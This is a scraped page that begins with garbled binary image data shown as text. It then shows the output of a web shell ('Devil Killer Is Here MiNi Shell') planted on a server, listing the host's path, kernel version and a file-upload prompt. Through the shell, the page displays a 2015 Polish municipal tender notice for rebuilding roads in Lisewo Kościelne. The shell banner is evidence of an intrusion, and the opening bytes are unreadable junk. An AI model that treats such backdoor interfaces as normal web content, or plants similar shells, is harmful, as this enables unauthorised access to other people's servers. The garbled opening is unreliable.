JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20150311/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20150311/34027-N-2015.html

<p class="kh_header"><b>Złotniki Kujawskie: Przebudowa dróg gminnych w miejscowości Lisewo Kościelne gm. Złotniki Kujawskie</b><br>
<b>Numer ogłoszenia: 34027 - 2015; data zamieszczenia: 11.03.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Urząd Gminy , ul. Powstańców Wlkp. 6, 88-180 Złotniki Kujawskie, woj. kujawsko-pomorskie.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotnikikuj.cc.</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przebudowa dróg gminnych w miejscowości Lisewo Kościelne gm. Złotniki Kujawskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Przebudowa drogi gminnej w miejscowości Lisewo Kościelne - polegającej na wykonaniu jezdni i zjazdów na 3 odcinkach dróg gminnych, 2 skrzyżowań z drogą powiatową nr 2359C oraz poboczy i rowów odparowujących. Istniejący pas drogowy ma szerokość od 6,00 m do 9,50 m. Drogi gminne otoczone są zabudową mieszkaniową, zabudową gospodarczą, polami uprawnymi, a także przy odcinku nr 1 zlokalizowana jest przepompownia ścieków. Powierzchnia dróg gminnych jest utwardzona nie ulepszona. Odcinek nr 1 krzyżuje się z drogą powiatową i projektowanym odcinkiem nr 3. Odcinek nr 2 krzyżuje się z drogą powiatową oraz odcinkiem nr 3, a odcinek nr 3 krzyżuje się z odcinkiem nr 2 i nr 1. Według inwentaryzacji geodezyjnej na terenie przebudowywanej drogi występują uzbrojenia podziemne, tj. wodociąg, urządzenia energetyczne i telekomunikacyjne oraz kanalizacja sanitarna. Zakres zamówienia obejmuje: A. Roboty przygotowawcze polegające na odtworzeniu trasy i punktów wysokościowych, usunięciu warstwy darniny, rozbiórce istniejącego płotu oraz ustawienie go w nowym położeniu - płot obecnie ustawiony jest w pasie drogowym, wycince drzew i krzewów oraz karczowanie pniaków drzew - inwestycja wymaga wycinki 8 istniejących drzew tj. topola o pierścieniu 62cm, 305 cm, 318 cm i 41 cm, jesion - 128cm, świerk - 20 cm i 25 cm oraz robinia akacjowa - 156 cm, zabezpieczenie sieci telekomunikacyjnych i energetycznych - istniejące sieci telekomunikacyjne oraz elektroenergetyczne, pod jezdniami i zjazdami należy zabezpieczyć rurami osłonowymi, regulacja pionowa studzienek, formowanie i zagęszczenie nasypów. * Wycięte drzewa Wykonawca przekaże Zamawiającemu ze składowaniem na terenie w Mierzwinie. B. Roboty budowlane - Drogi gminne podzielono na 3 odcinki. - Odcinek nr 1 - o łącznej długości 792,10 m, należy wykonać nawierzchnie z betonu asfaltowego i o szerokości 4,00 m od km 0+000 - od skrzyżowania z drogą powiatową do km 0+271,95 oraz o szerokości 4,50 m od km 0+271,95 do km 0+792,10. Skrzyżowanie z drogą powiatową wyokrąglono łukami o promieniu R8,00 m i R6,00 m, z odcinkiem nr 3 łuki o promieniu R6,00 m i R4,00 m, z drogami gminnymi łuki o promieniu R8,00 m i R10,00 m. Zjazdy o nawierzchni z betonu asfaltowego o szerokości i długości dostosowanej do istniejących. Spadek poprzeczny jezdni od km 0+000 do km 0+083,00 - dwustronny spadek poprzeczny o wartości 2%, od km 0+083,00 do km 0+103,00 - zmiana spadku poprzecznego, od km 0+103,00 do km 0+456,00 - jednostronny spadek poprzeczny o wartości 2 % w kierunku na prawo, od km 0+456,00 do km 0+476,00 - zmiana spadku poprzecznego, od km 0+476,00 do km 0+792,10 - dwustronny spadek poprzeczny o wartości 2%. - Odcinek nr 2 - o łącznej długości 152,90 m, należy wykonać nawierzchnie z betonu asfaltowego i o szerokości 4,50 m od km 0+000 - od skrzyżowania z drogą powiatową do km 0+152,90. Skrzyżowanie z drogą powiatową wyokrąglono łukami o promieniu R8,00 m i R10,00 m, z odcinkiem nr 3 R6,00 m. Zjazdy o nawierzchni z betonu asfaltowego o szerokości i długości dostosowanej do istniejących. Spadek poprzeczny jezdni od km 0+000 do km 0+152,90 - jednostronny spadek poprzeczny o wartości 2 % w kierunku na prawo. - Odcinek nr 3 - o łącznej długości 173,10 m, należy wykonać nawierzchnie z betonu asfaltowego i o szerokości 4,00 m, od km 0+000 do km 0+173,10. Skrzyżowanie z odcinkiem nr 1 wyokrąglono łukami o promieniu R4,00 m i R6,00 m, a z odcinkiem nr 2 wyokrąglono łuk o promieniu R6,00 m. Zjazdy o nawierzchni z betonu asfaltowego o szerokości i długości dostosowanej do istniejących. W km 0+128,70 należy wykonać dojazd na działkę nr 36 o szerokości 3,50 m, o nawierzchni z betonu asfaltowego i długości 40,20 m. Spadek poprzeczny jezdni od km 0+000 do km 0+152,90 - jednostronny spadek poprzeczny o wartości 2 % w kierunku na lewo. C. Wykonanie poboczy - Dwustronnie utwardzone pobocza mieszanką optymalną (destrukt) o szerokości 0,75 m, o spadku poprzecznym 8%. Należy stosować mieszankę optymalną kruszywa łamanego gr. 15 cm - kruszywo łamane betonowe z recyklingu o frakcji 0/31,5 mm. UWAGA: Projekt budowlano-wykonawczy zawiera ogólny zapis o wykonaniu poboczy, natomiast szczegóły wykonania poboczy zawiera Specyfikacja techniczna wykonania i odbioru robót i SIWZ. D. Wykonanie rowów odparowujących o głębokości 0,50 m i szerokości 1,00 m, E. Odwodnienie - nawierzchnie dróg gminnych odwadnia się poprzez zaprojektowane spadki poprzeczne i podłużne, na teren pasa drogowego i rowów odparowujących, F. Wykonanie oznakowania pionowego - Ustawienie słupków z rur stalowych dla znaków drogowych wraz z wykonaniem i zasypaniem dołów oraz z wykonaniem fundamentu betonowego. Przymocowanie do słupków tarcz znaków drogowych odblaskowych - grupa wielkości średni D-1, A-7. G. Zakres i technologia robót - roboty przygotowawcze - roboty pomiarowe, - usunięcie warstwy darniny, wycinka drzew i krzewów, układanie rur osłonowych, regulacja pionowa studzienek - roboty ziemne, - formowanie i zagęszczanie nasypów, - roboty budowlane - jezdnia - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne, - ułożenie warstwy geotkaniny separacyjno-filtracyjnej - wykonanie i zagęszczenie warstwy odsączającej z kruszywa mrozoodpornego w korycie lub na całej szerokości drogi, gr. warstwy po zagęszczeniu 25 cm, - wykonanie podbudowy z gruntu stabilizowanego cementem, - wykonanie podbudowy pomocniczej z kruszywa łamanego o uziarnieniu ciągłym 0/31,5 mm stabilizowanego, - skropienie warstw konstrukcyjnych nieulepszonych emulsją asfaltową, - wykonanie nawierzchni z betonu asfaltowego, - wykonanie oczyszczenia nawierzchni drogowych, - skropienie warstw konstrukcyjnych ulepszonych emulsją asfaltową, - wykonanie nawierzchni z betonu asfaltowego, - wypełnienie szczelin pomiędzy jezdnią i krawężnikami masą zalewową lub zastosowanie taśmy asfaltowej; - zjazdy - profilowanie i zagęszczanie podłoża pod warstwy konstrukcyjne, - ułożenie warstwy geotkaniny separacyjno-filtracyjnej - wykonanie i zagęszczenie warstwy odsączającej z kruszywa mrozoodpornego w korycie lub na całej szerokości drogi, gr. warstwy po zagęszczeniu 20 cm, - wykonanie podbudowy pomocniczej z kruszywa łamanego o uziarnieniu ciągłym 0/31,5 mm stabilizowanego, - skropienie warstw konstrukcyjnych nieulepszonych emulsją asfaltową, - wykonanie nawierzchni z betonu asfaltowego; - pobocza- wykonanie umocnionych poboczy z mieszanki optymalnej gr. 15 cm - kruszywo łamane betonowe z recyklingu o frakcji 0/31,5 mm; - rowy - wykonanie rowów trójkątnych szerokości 1,00 m i głębokości 0,50 m; - oznakowanie pionowe; - przestawienie ogrodzenia - rozebranie i odbudowanie ogrodzenia z cegieł, ażurowego wraz z rozbiórką i wykonaniem cokołu betonowego; - ścianki czołowe istniejącego przepustu - rozebranie przepustów rurowych, - ścianki czołowe i ławy betonowe, - wykonanie ścianki czołowej przepustu z betonu C25/30 z montażem zbrojenia z zagruntowaniem roztworem asfaltowym, - wykonanie umocnienia skarpy narzutem kamiennym gr. 20 cm, zabrukowanie kamieniem brukowym na podsypce cementowo-piaskowej, spoiny wypełnione zaprawą cementową, -wykonanie umocnienia dna w obrębie wlotu i wylotu teokratą perforowaną gr. 15 cm z wypełnieniem tłuczniem drobnym na włókninie filtracyjnej, - oczyszczenie istniejących przepustów z namułu. - Czasowa organizacja ruchu - oznakowanie zgodnie z Projektem Czasowej Organizacji Ruchu - jest na etapie uzgodnienia, - Stała organizacja ruchu - zakres zgodnie z Projektem Stałej Organizacji Ruchu. Zakres zamówienia obejmuje kompleksową obsługę geodezyjną. Szczegółowy zakres zamówienia zawiera: Szczegółowy zakres zamówienia zawiera dokumentacja projektowa, projekt czasowej i stałej organizacji ruchu, specyfikacja techniczna wykonania i odbioru robót, wymagania zawarte w siwz, natomiast przedmiar robót jest elementem pomocniczym. Przedmiary robót stanowią dokumenty pomocnicze do wyceny zadania.</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający dopuszcza możliwość udzielenia zamówień uzupełniających stanowiących nie więcej niż 10% wartości zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.23.30.00-9, 45.23.32.90-8, 45.23.31.00-0, 45.23.00.00-8, 45.34.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.09.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań których spełnienie wykonawca zobowiązany jest udokumentować.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli wykonawca wykaże wykonanie, w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie należyte wykonanie: co najmniej dwóch robót budowlanych polegających na budowie i/lub, przebudowie i/ lub remoncie drogi z nawierzchnią bitumiczną o długości co najmniej 0,7 km każda.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony jeżeli Wykonawca wykaże dysponowanie osobami , zdolnymi do wykonania zamówienia, które będą uczestniczyć w jego wykonaniu, w szczególności osobą posiadającą, uprawnienia budowlane do pełnienia funkcji:        
1) kierownika budowy w branży drogowej.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Za spełnienie warunku dotyczącego sytuacji ekonomicznej i finansowej Zamawiający uzna posiadanie: a) Informacji banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową na kwotę nie mniejszą niż 250.000,00 zł. b) opłaconej polisy a w przypadku jej braku innego dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na kwotę nie mniejszą niż 400.000,00 PLN.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Kosztorys ofertowy i wykaz podwykonawców</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Okres gwarancji - 5</li>
</ul>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza następujące możliwości zmiany postanowień umowy w stosunku do treści oferty: 1) zmiany osób występujących po stronie Zamawiającego/Wykonawcy, 2) zmiana adresu/siedziby/firmy Zamawiającego/Wykonawcy, 3) zmiana postanowień zawartej umowy, w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli zajdzie którykolwiek z niżej wymienionych warunków: - zajdzie konieczność wprowadzenia zmian w dokumentacji projektowej w sposobie lub technologii wykonania przedmiotu umowy, a co się z tym wiąże zastosowaniem robót zamiennych i zamiany materiałów i urządzeń przewidzianych do wykonania robót w stosunku do materiałów i urządzeń przewidzianych w dokumentacji projektowej, z zachowaniem wymogów technicznych i jakościowych, - gdy zaistnieje inna, niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie ze specyfikacją istotnych warunków zamówienia - Zamawiający dopuszcza możliwość zmiany umowy, a w szczególności terminu realizacji zamówienia. 4) przedłużenia terminu wykonania umowy o czas opóźnienia, jeżeli takie opóźnienie będzie miało wpływ na wykonanie przedmiotu umowy i uwarunkowane jest: a) wstrzymaniem robót przez Zamawiającego w okolicznościach, za które nie ponosi Wykonawca żadnej odpowiedzialności; b) wykopaliskami uniemożliwiającymi wykonywanie robót; c) szczególnie niesprzyjającymi warunkami atmosferycznymi i gruntowymi uniemożliwiającymi prowadzenie robót budowlanych zgodnie ze sztuką budowlaną i wiedzą techniczną; d) koniecznością dokonania istotnych zmian w dokumentacji projektowej na wniosek stron; e) wystąpieniem siły wyższej; 5) konieczności usunięcia błędów w dokumentacji projektowej oraz konieczności przeprojektowania określonych zakresów obiektu w trakcie realizacji inwestycji, niezbędnych do prawidłowego wykonania przedmiotu umowy;  6) wystąpienie innych szczególnych okoliczności, za które Wykonawca nie jest odpowiedzialny, 7) nastąpi zmiana podatku od towarów i usług VAT, kiedy wynagrodzenie brutto zostanie dostosowane do aktualnie obowiązujących przepisów w tym zakresie. Warunki dokonania zmian: a) zmiana postanowień zawartej umowy może nastąpić wyłącznie za zgodą obu stron, wyrażoną na piśmie, pod rygorem nieważności, b) strona występująca o zmianę postanowień zawartej umowy: - opisze zaistniałe okoliczności, - uzasadni, udokumentuje zaistnienie powyższych okoliczności, - opisze wpływ zmian na termin wykonania umowy. c) wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie. 6.Rozwinięcie całości zasad, praw i obowiązków stron realizujących przedmiot zamówienia przedstawia wzór umowy stanowiący załącznik nr 8 do niniejszej specyfikacji.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.zlotnikikuj.ires.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Złotniki Kujawskie ul. Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.03.2015 godzina 11:00, miejsce: Urząd Gminy Złotniki Kujawskie ul. Powstańców Wielkopolskich 6, 88-180 Złotniki Kujawskie, pok. nr 27, I piętro.</p>
